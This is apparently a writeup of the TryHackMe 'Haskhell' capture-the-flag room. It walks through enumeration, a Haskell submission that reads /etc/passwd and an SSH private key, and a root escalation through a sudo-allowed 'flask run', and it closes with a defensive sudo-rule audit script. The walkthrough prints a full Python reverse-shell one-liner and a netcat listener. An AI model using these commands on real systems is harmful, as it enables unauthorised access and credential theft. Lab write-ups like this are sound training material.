
Haskhell writeup

Description:

The following post is a writeup of the Haskhell room on TryHackMe: https://tryhackme.com/room/haskhell

Machine Details

| OS | Linux |
| Rating | Medium |
| Creator | sgtscout |

Summary:

The machine has a webpage on port 5001 where you see a message from your professor about uploading an assignment. We wrote a simple Haskell script to read files (I am not good at Haskell). We got lucky with the file permissions and got id_rsa printed back to us. After logging in as that user, for privilege escalation we have sudo permission to run a Flask app, so we run a Python reverse shell as the Flask app.

Walkthrough:

Enumeration

Let's start with an nmap scan:

```
nmap -sC -sV <ip>
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.91 seconds
```

We can see a web server (Gunicorn) on port 5001.

Let's brute-force its directories with gobuster:

```
┌─[✗]─[silver@parrot]─[~]
└──╼ $gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.30.179:5001
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.30.179:5001
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/04 00:56:40 Starting gobuster
===============================================================
/submit (Status: 200)
===============================================================
2020/08/04 01:01:57 Finished
===============================================================
```

We got a /submit directory; let's see what we can submit there. The page accepts Haskell source, so we write a small Haskell script to see whether we get any output back:

```haskell
└──╼ $cat try.hs
-- Read a file on the server and print its contents in the response
main = do
 x <- readFile "/etc/passwd"
 putStr x
```

Now we know about the user prof, so let's check for an SSH key: we changed the readFile path to /home/prof/.ssh/id_rsa.

We got the key, hurray. Let's try cracking it with john:

```
└──╼ $/usr/share/john/ssh2john.py id_rsa > crack.hash
id_rsa has no password!


prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run
```

Now we know that flask run executes Python code, so let's try a Python reverse shell:

```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

```shell
$ export FLASK_APP=hello.py
$ export FLASK_DEBUG=1
$ flask run
```

And catch the shell with a listener:

```shell
nc -lvnp 1234
```

Rooted
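The root cause of the privesc is the sudo rule itself: env_keep+=FLASK_APP combined with NOPASSWD on flask run lets the invoking user choose which Python file runs as root. The following audit script, added here as an example and not part of the room or the original post, parses sudo -l output and flags exactly that pattern; the `sudo -l` text is embedded from this writeup, and the python/PYTHONPATH entries are an assumption about how other interpreter-driven commands behave.

```python
import os
import re

# Constructed sample input: the `sudo -l` output from this writeup, embedded so the
# audit runs offline. A real audit would feed it live `sudo -l` output instead.
SUDO_L_OUTPUT = """\
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run
"""

# Commands whose behaviour is steered by an env var naming a file to load.
# flask/FLASK_APP is the pairing from the page; the python entries are an assumption
# based on how CPython treats those variables.
ENV_DRIVEN_COMMANDS = {
    "flask": {"FLASK_APP"},
    "python": {"PYTHONPATH", "PYTHONSTARTUP"},
    "python3": {"PYTHONPATH", "PYTHONSTARTUP"},
}

RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s+(?:(NOPASSWD|PASSWD):\s*)?(.+?)\s*$")


def parse_sudo_l(text):
    """Return (kept_env, rules): env vars preserved by env_keep, and (runas, nopasswd, cmd)."""
    kept = set()
    for value in re.findall(r'env_keep\+="?([^",]+)"?', text):
        kept.update(value.split())
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # rule lines follow this header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            runas, tag, cmd = m.groups()
            rules.append((runas.strip(), tag == "NOPASSWD", cmd))
    return kept, rules


def audit(text):
    """Flag root rules whose command honours an env var that sudo keeps from the caller."""
    kept, rules = parse_sudo_l(text)
    findings = []
    for runas, nopasswd, cmd in rules:
        base = os.path.basename(cmd.split()[0])
        risky = sorted(ENV_DRIVEN_COMMANDS.get(base, set()) & kept)
        if runas == "root" and risky:
            findings.append({"command": cmd, "env": risky, "nopasswd": nopasswd})
    return findings
```

On this room's `sudo -l` output it reports `/usr/bin/flask run` with FLASK_APP kept, which is the finding a host audit should raise; removing FLASK_APP from env_keep (or dropping the rule) makes it report nothing.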

This post is licensed under CC BY 4.0 by the author.